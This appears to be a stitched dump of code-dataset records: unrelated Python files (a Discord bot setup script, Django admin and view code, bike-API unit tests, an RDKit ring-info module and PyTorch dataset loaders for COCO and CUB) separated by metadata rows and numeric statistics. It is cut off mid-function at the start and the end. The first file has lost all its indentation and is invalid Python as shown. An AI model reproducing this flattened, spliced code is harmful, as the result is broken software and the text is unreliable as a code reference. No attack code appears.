env.write(f"GUILD_ID={guild}" + "\n")
env.write(f"LOG_CHANNEL={log_channel}")
if log_channel == "":
os.chdir("cogs")
os.remove("logs.py")
os.chdir("..")
print("File logs.py removed.")
time.sleep(5)
exit()
else:
print("Setup complete.")
time.sleep(5)
exit()
if info_recheck == "N" or info_recheck == "n":
print("Please restart the setup.")
exit()
def tutorial():
print("Welcome to the BeepBoopBot Tutorial! We will explain how to get information needed for the setup here.")
print("\nToken: Go to https://discord.com/developers/applications and click on your Application\nthen click on the 'Bot' in left sidebar, click on 'Copy' under your Bot's name\n")
print("Prefix: Enter the prefix you want for your bot\n")
print("Member Role: Go to the Discord App, Right click on your Member role and click 'Copy ID'.\n")
print("Moderator Role: Go to the Discord App, Right click on your Moderator role and click 'Copy ID'.\n")
print("Admin Role: Go to the Discord App, Right click on your Admin role and click 'Copy ID'.\n")
print("Guild ID: Go to the Discord App, Right click on your Guild and click 'Copy ID'.\n")
print("Log Channel ID: Go to the Discord App, Right click on your Log Channel and click 'Copy ID'.\n")
setup_after_tutorial = input("Do you want to go back to the setup? [Y/N]\n")
if setup_after_tutorial == "Y" or setup_after_tutorial == "y":
main()
else:
exit()
def setup_and_tutorial():
print("\n")
token = input("Please enter your Bot token\nSteps: Go to https://discord.com/developers/applications and click on your Application\nthen click on the 'Bot' in left sidebar, click on 'Copy' under your Bot's name\n")
prefix = input("Please enter your Bot prefix\nSteps: Enter the prefix you want for your bot\n")
member = input("Please enter your Member ID\nSteps: Go to the Discord App, Right click on your Member role and click 'Copy ID'.\n")
mod = input("Please enter your Moderator ID\nSteps: Go to the Discord App, Right click on your Moderator role and click 'Copy ID'.\n")
admin = input("Please enter your Admin ID\nSteps: Go to the Discord App, Right click on your Admin role and click 'Copy ID'.\n")
guild = input("Please enter your Guild ID\nSteps: Go to the Discord App, Right click on your Guild and click 'Copy ID'.\n")
log_channel = input("Please enter the channel ID for logs. (Press ENTER to disable logs)\nSteps: Go to the Discord App, Right click on your Log Channel and click 'Copy ID'.\n")
print("\n\n")
print("Confirm with these values.")
time.sleep(2)
print(f"Token: {token}")
print(f"Prefix: {prefix}")
print(f"Member Role ID: {member}")
print(f"Moderator Role ID: {mod}")
print(f"Admin Role ID: {admin}")
print(f"Guild ID: {guild}")
print(f"Log Channel ID: {log_channel}")
info_recheck = input("Is that information correct? [Y/N]\n")
if info_recheck == "Y" or info_recheck == "y":
print("Please wait while the bot is being setup.")
with open(".env", "w") as env:
env.write(f"TOKEN={token}" + "\n")
env.write(f"PREFIX={prefix}" + "\n")
env.write(f"MEMBER_ROLE={member}" + "\n")
env.write(f"MODERATOR_ROLE={mod}" + "\n")
env.write(f"ADMIN_ROLE={admin}" + "\n")
env.write(f"GUILD_ID={guild}" + "\n")
env.write(f"LOG_CHANNEL={log_channel}")
if log_channel == "":
os.chdir("cogs")
os.remove("logs.py")
os.chdir("..")
print("File logs.py removed.")
time.sleep(5)
exit()
else:
print("Setup complete.")
time.sleep(5)
exit()
if info_recheck == "N" or info_recheck == "n":
print("Please restart the setup.")
exit()
def main():
print("Welcome to the BeepBoopBot setup.")
main = input("Please chose from the following options:\n[1] Tutorial\n[2] Setup\n[3] Both\n[4] Exit\n")
if main == "1":
tutorial()
if main == "2":
setup()
if main == "3":
setup_and_tutorial()
if main == "4":
exit()
else:
print("Please enter a valid option.")
main()
if __name__ == "__main__":
main() | 48.047619 | 449 | 0.572184 | 857 | 6,054 | 3.988331 | 0.134189 | 0.032768 | 0.065535 | 0.070217 | 0.834699 | 0.818315 | 0.816852 | 0.793446 | 0.73464 | 0.674664 | 0 | 0.003279 | 0.294681 | 6,054 | 126 | 450 | 48.047619 | 0.79719 | 0 | 0 | 0.658333 | 0 | 0.116667 | 0.565318 | 0.008258 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.016667 | 0 | 0.05 | 0.316667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ae4089bedfddc1a6ca8fc1b6728941395f3b414d | 196 | py | Python | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | null | null | null | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | null | null | null | content/admin.py | pratikgoel145/AlgoBuddy-Web-Application | 2ea3c6e3ca1127aced9968319d9a9bb7978b66bf | [
"MIT"
] | 1 | 2017-10-25T10:25:03.000Z | 2017-10-25T10:25:03.000Z | from django.contrib import admin
from .models import Post, Comment, Markread
admin.site.register(Post)
admin.site.register(Comment)
admin.site.register(Markread)
# admin.site.register(Profile) | 19.6 | 43 | 0.80102 | 27 | 196 | 5.814815 | 0.444444 | 0.229299 | 0.433121 | 0.318471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 196 | 10 | 44 | 19.6 | 0.882022 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ae4b2dce74d1c00c6d5106f8c1070015b15d50d4 | 253 | py | Python | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | 7 | 2021-05-28T02:57:23.000Z | 2022-03-28T13:37:43.000Z | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | 1 | 2021-06-18T08:40:56.000Z | 2021-06-18T09:47:23.000Z | dataloader/__init__.py | doc-doc/NExT-OE | a45d81a48ab5ccc45ff6f7bea60597cc59bc546e | [
"MIT"
] | null | null | null | # ====================================================
# @Time : 15/5/20 3:48 PM
# @Author : Xiao Junbin
# @Email : junbin@comp.nus.edu.sg
# @File : __init__.py
# ====================================================
from .sample_loader import * | 36.142857 | 54 | 0.355731 | 23 | 253 | 3.695652 | 0.956522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036697 | 0.13834 | 253 | 7 | 55 | 36.142857 | 0.353211 | 0.837945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
ae8cd42184ddff35e348d1530812a6ae8e4b3df9 | 6,088 | py | Python | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | null | null | null | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | null | null | null | sustainableCityManagement/tests/Bike_API/test_graphvalues_bike.py | Josh-repository/Dashboard-CityManager- | 6287881be9fb2c6274a755ce5d75ad355346468a | [
"RSA-MD"
] | 1 | 2021-05-13T16:33:18.000Z | 2021-05-13T16:33:18.000Z | from main_project.Bike_API.graphvalues_bike import GraphValuesBike
from main_project.Bike_API import fetch_bikeapi
from main_project.Bike_API.store_bikedata_to_database import StoreBikeDataToDatabase
from main_project.Bike_API.store_processed_bikedata_to_db import StoreProcessedBikeDataToDB
from main_project.Bike_API.fetch_bikeapi import FetchBikeApi
from django.test import TestCase
from unittest.mock import MagicMock
import datetime
from freezegun import freeze_time
@freeze_time("2021-03-11 17")
class TestGraphValuesBike(TestCase):
@classmethod
def setUpTestData(cls):
pass
def test_graphvalue_call_locationbased_returns_error_with_days_historical_0(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_locationbased(days_historical=0)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_locationbased_returns_error_with_days_historical_1(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_locationbased(days_historical=1)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_locationbased(self):
graph_values_bike = GraphValuesBike()
store_processed_bike_data_to_database = StoreProcessedBikeDataToDB()
mocked_fetch_processed_data = [
{
"name": "test_abcd",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 10,
"total_stands": 50
}
]
},
{
"name": "test_abcdef",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 15,
"total_stands": 20
}
]
}
]
mocked_fetch_predicted_data = [
{
"name": "test_abcd",
"data": {
"in_use": 11
}
},
{
"name": "test_abcdef",
"data": {
"in_use": 12
}
}
]
store_processed_bike_data_to_database.fetch_processed_data = MagicMock(
return_value=mocked_fetch_processed_data)
store_processed_bike_data_to_database.fetch_predicted_data = MagicMock(
return_value=mocked_fetch_predicted_data)
expected_result = {
'test_abcd': {
'TOTAL_STANDS': 50,
'IN_USE': {
'2021-03-12': 11,
'2021-03-15': 10
}
},
'test_abcdef': {
'TOTAL_STANDS': 20,
'IN_USE': {
'2021-03-12': 12,
'2021-03-15': 15
}
}
}
result = graph_values_bike.graphvalue_call_locationbased(days_historical=2,
store_processed_bike_data_to_db=store_processed_bike_data_to_database)
self.assertDictEqual(result, expected_result)
def test_graphvalue_call_overall_returns_error_with_days_historical_0(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_overall(days_historical=0)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_overall_returns_error_with_days_historical_1(self):
graph_values_bike = GraphValuesBike()
with self.assertRaises(ValueError) as context:
graph_values_bike.graphvalue_call_overall(days_historical=1)
assert str(context.exception) == 'Assign days_historic parameter >= 2.'
def test_graphvalue_call_overall(self):
graph_values_bike = GraphValuesBike()
store_processed_bike_data_to_database = StoreProcessedBikeDataToDB()
mocked_fetch_processed_data = [
{
"name": "test_abcd",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 10,
"total_stands": 50
}
]
},
{
"name": "test_abcdef",
"data": [
{
"day": datetime.datetime(2021, 3, 15, 16, 45, 0),
"in_use": 15,
"total_stands": 20
}
]
}
]
mocked_fetch_predicted_data = [
{
"name": "test_abcd",
"data": {
"in_use": 11
}
},
{
"name": "test_abcdef",
"data": {
"in_use": 12
}
}
]
store_processed_bike_data_to_database.fetch_processed_data = MagicMock(
return_value=mocked_fetch_processed_data)
store_processed_bike_data_to_database.fetch_predicted_data = MagicMock(
return_value=mocked_fetch_predicted_data)
expected_result = {
'ALL_LOCATIONS': {
'TOTAL_STANDS': 20,
'IN_USE': {
'2021-03-12': 12,
'2021-03-15': 15
}
}
}
result = graph_values_bike.graphvalue_call_overall(days_historical=2,
store_processed_bike_data_to_db=store_processed_bike_data_to_database)
self.assertDictEqual(result, expected_result)
| 34.202247 | 135 | 0.535644 | 561 | 6,088 | 5.404635 | 0.16221 | 0.055409 | 0.059367 | 0.072559 | 0.859169 | 0.833113 | 0.815303 | 0.815303 | 0.808707 | 0.808707 | 0 | 0.043316 | 0.385677 | 6,088 | 177 | 136 | 34.39548 | 0.76738 | 0 | 0 | 0.496689 | 0 | 0 | 0.091327 | 0 | 0 | 0 | 0 | 0 | 0.066225 | 1 | 0.046358 | false | 0.006623 | 0.059603 | 0 | 0.112583 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
885ee501732df60a8b4b5e0c802f3e8cb53c9694 | 2,848 | py | Python | voxel_globe/tiepoint_registration/views.py | ngageoint/voxel-globe | 91f386de652b704942165889c10468b2c4cf4eec | [
"MIT"
] | 28 | 2015-07-27T23:57:24.000Z | 2020-04-05T15:10:52.000Z | voxel_globe/tiepoint_registration/views.py | VisionSystemsInc/voxel_globe | 6eb3fca5586726428e9d914f7b730ca164c64a52 | [
"MIT"
] | 50 | 2016-02-11T15:50:22.000Z | 2016-10-27T22:38:27.000Z | voxel_globe/tiepoint_registration/views.py | ngageoint/voxel-globe | 91f386de652b704942165889c10468b2c4cf4eec | [
"MIT"
] | 8 | 2015-07-27T19:22:03.000Z | 2021-01-04T09:44:48.000Z | from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext, loader
def tiepoint_registration_1(request):
from voxel_globe.meta import models
image_set_list = models.ImageSet.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_registration_1.html',
{'image_set_list':image_set_list})
def tiepoint_registration_2(request, image_set_id):
from voxel_globe.meta import models
camera_set_list = models.ImageSet.objects.get(id=image_set_id).cameras.all()
return render(request, 'tiepoint_registration/html/tiepoint_registration_2.html',
{'camera_set_list':camera_set_list,
'image_set_id':image_set_id})
def tiepoint_registration_3(request, image_set_id, camera_set_id):
from voxel_globe.tiepoint_registration import tasks
image_set_id = int(image_set_id)
t = tasks.tiepoint_registration.apply_async(args=(image_set_id,camera_set_id), user=request.user)
return render(request, 'tiepoint_registration/html/tiepoint_registration_3.html',
{'task_id': t.task_id})
def tiepoint_error_1(request):
from voxel_globe.meta import models
image_set_list = models.ImageSet.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_1.html',
{'image_set_list':image_set_list})
def tiepoint_error_2(request, image_set_id):
from voxel_globe.meta import models
camera_set_list = models.ImageSet.objects.get(id=image_set_id).cameras.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_2.html',
{'camera_set_list':camera_set_list,
'image_set_id':image_set_id})
def tiepoint_error_3(request, image_set_id, camera_set_id):
from voxel_globe.meta import models
scene_list = models.Scene.objects.all()
return render(request, 'tiepoint_registration/html/tiepoint_error_3.html',
{'scene_list':scene_list,
'camera_set_id':camera_set_id,
'image_set_id':image_set_id})
def tiepoint_error_4(request, image_set_id, camera_set_id, scene_id):
from voxel_globe.tiepoint_registration import tasks
image_set_id = int(image_set_id)
t = tasks.tiepoint_error_calculation.apply_async(args=(image_set_id,
camera_set_id,
scene_id),
user=request.user)
return render(request, 'tiepoint_registration/html/tiepoint_error_4.html',
{'task_id': t.task_id})
def order_status(request, task_id):
from celery.result import AsyncResult
task = AsyncResult(task_id)
return render(request, 'task/html/task_3d_error_results.html',
{'task': task}) | 41.275362 | 99 | 0.704705 | 375 | 2,848 | 4.978667 | 0.138667 | 0.06963 | 0.101768 | 0.101232 | 0.792716 | 0.784146 | 0.784146 | 0.758972 | 0.724692 | 0.650777 | 0 | 0.006646 | 0.207514 | 2,848 | 69 | 100 | 41.275362 | 0.820558 | 0 | 0 | 0.423077 | 0 | 0 | 0.185328 | 0.137943 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.211538 | 0 | 0.519231 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
888ec2bc58a265e0fbc146042817b28132dad16e | 252 | py | Python | markflow/detectors/table.py | arounkles/markflow | fb13a5ed5f2df958e068b869e8dbdcd2d93b1552 | [
"Apache-2.0"
] | null | null | null | markflow/detectors/table.py | arounkles/markflow | fb13a5ed5f2df958e068b869e8dbdcd2d93b1552 | [
"Apache-2.0"
] | null | null | null | markflow/detectors/table.py | arounkles/markflow | fb13a5ed5f2df958e068b869e8dbdcd2d93b1552 | [
"Apache-2.0"
] | null | null | null | from typing import List
def table_started(line: str, index: int, lines: List[str]) -> bool:
return line.lstrip().startswith("|")
def table_ended(line: str, index: int, lines: List[str]) -> bool:
return not table_started(line, index, lines)
| 25.2 | 67 | 0.690476 | 37 | 252 | 4.621622 | 0.486486 | 0.093567 | 0.187135 | 0.175439 | 0.432749 | 0.432749 | 0.432749 | 0.432749 | 0.432749 | 0 | 0 | 0 | 0.162698 | 252 | 9 | 68 | 28 | 0.810427 | 0 | 0 | 0 | 0 | 0 | 0.003968 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
31fc9f2b6a6b8e931884497f79ec865187cabb6b | 36 | py | Python | tests/tests/test_initial.py | mchalski/mtls-ping | a0eeedf5dc4af6dd684d5bb33741bfa4c49044c6 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_initial.py | mchalski/mtls-ping | a0eeedf5dc4af6dd684d5bb33741bfa4c49044c6 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_initial.py | mchalski/mtls-ping | a0eeedf5dc4af6dd684d5bb33741bfa4c49044c6 | [
"Apache-2.0"
] | null | null | null | def test_initial():
assert True
| 12 | 19 | 0.694444 | 5 | 36 | 4.8 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 36 | 2 | 20 | 18 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee2d5ffd926d4bd61ac018bb0651c10ec0570d0c | 3,149 | py | Python | chembl_beaker/beaker/core_apps/ringInfo/impl.py | mnowotka/chembl_beaker | 1fb87990ac353b0fa06ab7186d99eae8784da13d | [
"Apache-2.0"
] | 7 | 2015-04-02T16:54:16.000Z | 2021-04-06T13:16:21.000Z | chembl_beaker/beaker/core_apps/ringInfo/impl.py | mnowotka/chembl_beaker | 1fb87990ac353b0fa06ab7186d99eae8784da13d | [
"Apache-2.0"
] | null | null | null | chembl_beaker/beaker/core_apps/ringInfo/impl.py | mnowotka/chembl_beaker | 1fb87990ac353b0fa06ab7186d99eae8784da13d | [
"Apache-2.0"
] | 6 | 2015-03-13T17:31:33.000Z | 2020-06-28T18:28:26.000Z | __author__ = 'mnowotka'
from rdkit import Chem
from rdkit.Chem.rdmolops import SanitizeFlags as sf
SANITIZE_ALL = sf.SANITIZE_ALL
from chembl_beaker.beaker.utils.functional import _apply, _call
from chembl_beaker.beaker.utils.io import _parseMolData, _getSDFString
#-----------------------------------------------------------------------------------------------------------------------
def _atomRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'AtomRings')
#-----------------------------------------------------------------------------------------------------------------------
def _bondRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'BondRings')
#-----------------------------------------------------------------------------------------------------------------------
def _isAtomInRing(data, index, size, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'IsAtomInRingOfSize', index, size)
#-----------------------------------------------------------------------------------------------------------------------
def _isBondInRing(data, index, size, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'IsBondInRingOfSize', index, size)
#-----------------------------------------------------------------------------------------------------------------------
def _numAtomRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
ring_infos = _call(mols, 'GetRingInfo')
return [[ring_info.NumAtomRings(atom.GetIdx()) for atom in mol.GetAtoms()] for (mol, ring_info) in zip(mols, ring_infos)]
#-----------------------------------------------------------------------------------------------------------------------
def _numBondRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
ring_infos = _call(mols, 'GetRingInfo')
return [[ring_info.NumBondRings(bond.GetIdx()) for bond in mol.GetBonds()] for (mol, ring_info) in zip(mols, ring_infos)]
#-----------------------------------------------------------------------------------------------------------------------
def _numRings(data, sanitize=True, removeHs=True, strictParsing=True):
mols = _parseMolData(data, sanitize=sanitize, removeHs=removeHs, strictParsing=strictParsing)
return _call(_call(mols, 'GetRingInfo'), 'NumRings')
#-----------------------------------------------------------------------------------------------------------------------
| 58.314815 | 125 | 0.536361 | 251 | 3,149 | 6.545817 | 0.207171 | 0.087645 | 0.08521 | 0.102252 | 0.749848 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0.716981 | 0 | 0 | 0.079708 | 3,149 | 53 | 126 | 59.415094 | 0.566943 | 0.302318 | 0 | 0.310345 | 0 | 0 | 0.067154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.241379 | false | 0 | 0.137931 | 0 | 0.62069 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ee366b9d494bf59eedbbdf5a6492cb262b12f137 | 37,897 | py | Python | WRN-backbone-32/utils/wol_datasets.py | ashleylqx/AIB | 77e418cac52f0ca5f2a7c54927468a7bd75a8fc9 | [
"MIT"
] | 5 | 2021-05-23T13:05:45.000Z | 2022-02-13T21:40:59.000Z | WRN-backbone-32/utils/wol_datasets.py | ashleylqx/AIB | 77e418cac52f0ca5f2a7c54927468a7bd75a8fc9 | [
"MIT"
] | null | null | null | WRN-backbone-32/utils/wol_datasets.py | ashleylqx/AIB | 77e418cac52f0ca5f2a7c54927468a7bd75a8fc9 | [
"MIT"
] | 3 | 2021-08-11T03:23:31.000Z | 2021-11-17T01:48:52.000Z | import os
import pdb
import sys
import cv2
import pickle
import scipy.misc
import scipy.io
from scipy import ndimage
from scipy.ndimage import gaussian_filter
import numpy as np
import random
import json
from PIL import Image
from torchvision import datasets
# from caltech_my import Caltech101, Caltech256
# import torch.nn.functional as F
# from torch_geometric.data import Data, Batch
import torch.nn.functional as F
# --- coco api --------------
import json
import time
from collections import defaultdict
PYTHON_VERSION = sys.version_info[0]
if PYTHON_VERSION == 2:
from urllib import urlretrieve
elif PYTHON_VERSION == 3:
from urllib.request import urlretrieve
def _isArrayLike(obj):
return hasattr(obj, '__iter__') and hasattr(obj, '__len__')
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision import transforms
from kornia.enhance.zca import ZCAWhitening
from .config import *
# *** MS_COCO use one transform, CUG&ILSVRC use another transform
class MS_COCO(Dataset):
def __init__(self, root, mode='train', return_path=False, N=None,
img_h = COCO_RESIZE[0], img_w = COCO_RESIZE[1], transform=None): #'train', 'test', 'val'
self.path_dataset = root
self.path_images = os.path.join(self.path_dataset, mode+'2014')
self.return_path = return_path
self.img_h = img_h
self.img_w = img_w
self.transform = transform
# self.normalize_feature = normalize_feature
# get list images
list_names = os.listdir(self.path_images)
list_names = np.array([n.split('.')[0] for n in list_names])
self.list_names = list_names
# if mode=='train':
# list_names = np.array(['COCO_train2014_000000001108',
# 'COCO_train2014_000000002148',
# 'COCO_train2014_000000003348',
# 'COCO_train2014_000000004575'])
# elif mode=='val':
# list_names = np.array(['COCO_val2014_000000005586',
# 'COCO_val2014_000000011122',
# 'COCO_val2014_000000016733',
# 'COCO_val2014_000000022199'])
#
# self.list_names = list_names
if N is not None:
self.list_names = list_names[:N]
# self.coco = COCO(os.path.join(PATH_COCO, 'annotations', 'instances_%s2014.json'%mode))
self.imgNsToCat = pickle.load(open(os.path.join(PATH_COCO, 'imgNsToCat_{}.p'.format(mode)), "rb"))
# if mode=='train':
# random.shuffle(self.list_names)
# embed()
print("Init MS_COCO full dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
# Image and saliency map paths
rgb_ima = os.path.join(self.path_images, self.list_names[index]+'.jpg')
image = scipy.misc.imread(rgb_ima, mode='RGB')
image = cv2.resize(image, (self.img_w, self.img_h), interpolation=cv2.INTER_AREA).astype(np.float32)
if self.transform is not None:
img_processed = self.transform(image/255.)
else:
img_processed = transforms.ToTensor()(image)
# get coco label
label_indices = self.imgNsToCat[self.list_names[index]]
# label_indices = self.coco.imgNsToCat[self.list_names[index]]
label = torch.zeros(coco_num_classes)
if len(label_indices)>0:
label[label_indices] = 1
else:
label[0] = 1
if self.return_path:
return img_processed, label, self.list_names[index]
else:
return img_processed, label
# CUB
def get_name_id(name_path):
name_id = name_path.strip().split('/')[-1]
name_id = name_id.strip().split('.')[0]
return name_id
class CUB(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
# self.path_images = os.path.join(self.path_dataset, mode + '2014')
self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'lists/%s_list.txt'%self.mode)
list_names, labels = self.read_labeled_image_list(self.path_images, self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
self.list_names = list_names
self.labels = labels
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
print("Init CUB_200_2011 dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
img_name = self.list_names[index]
assert os.path.exists(img_name), 'file {} not exits'.format(img_name)
image = Image.open(img_name).convert('RGB')
if self.transform is not None:
image = self.transform(image)
if self.onehot_label:
gt_label = np.zeros(self.num_classes, dtype=np.float32)
gt_label[self.labels[index].astype(int)] = 1
else:
gt_label = self.labels[index].astype(np.long)
if self.return_path:
return image, gt_label, img_name.split('/')[-1].split('.')[0]
else:
return image, gt_label
def read_labeled_image_list(self, data_dir, data_list):
"""
Reads txt file containing paths to images and ground truth masks.
Args:
data_dir: path to the directory with images and masks.
data_list: path to the file with lines of the form '/path/to/image /path/to/mask'.
Returns:
Two lists with all file names for images and masks, respectively.
"""
f = open(data_list, 'r')
img_name_list = []
img_labels = []
for line in f:
if ';' in line:
image, labels = line.strip("\n").split(';')
else:
if len(line.strip().split()) == 2:
image, labels = line.strip().split()
if '.' not in image:
image += '.jpg'
labels = int(labels)
else:
line = line.strip().split()
image = line[0]
labels = map(int, line[1:])
img_name_list.append(os.path.join(data_dir, image))
img_labels.append(np.asarray(labels))
return img_name_list, img_labels
class CUB_crop(Dataset):
"""Face Landmarks dataset."""
def __init__(self, root, mode='train', return_path=False, N=None,
transform=None, onehot_label=False, num_classes=cub_classes): #'train', 'test'
"""
Args:
csv_file (string): Path to the csv file with annotations.
root (string): Directory with all the images.
transform (callable, optional): Optional transform to be applied
on a sample.
"""
self.path_dataset = root # PATH_CUB?
self.mode = mode
# self.path_images = os.path.join(self.path_dataset, mode + '2014')
self.path_images = os.path.join(self.path_dataset, 'images')
self.return_path = return_path
self.datalist_file = os.path.join(self.path_dataset, 'lists/%s_crop_list.txt'%self.mode)
list_names, labels, bboxes = self.read_labeled_image_crop_list(self.path_images, self.datalist_file)
self.transform = transform
self.onehot_label = onehot_label
self.num_classes = num_classes
self.trainFlag = False
list_names = np.array(list_names)
labels = np.array(labels)
bboxes = np.array(bboxes)
self.list_names = list_names
self.labels = labels
self.bboxes = bboxes
if N is not None:
self.list_names = list_names[:N]
self.labels = labels[:N]
self.bboxes = bboxes[:N]
print("Init CUB_200_2011 crop dataset in mode {}".format(mode))
print("\t total of {} images.".format(self.list_names.shape[0]))
def __len__(self):
return self.list_names.shape[0]
def __getitem__(self, index):
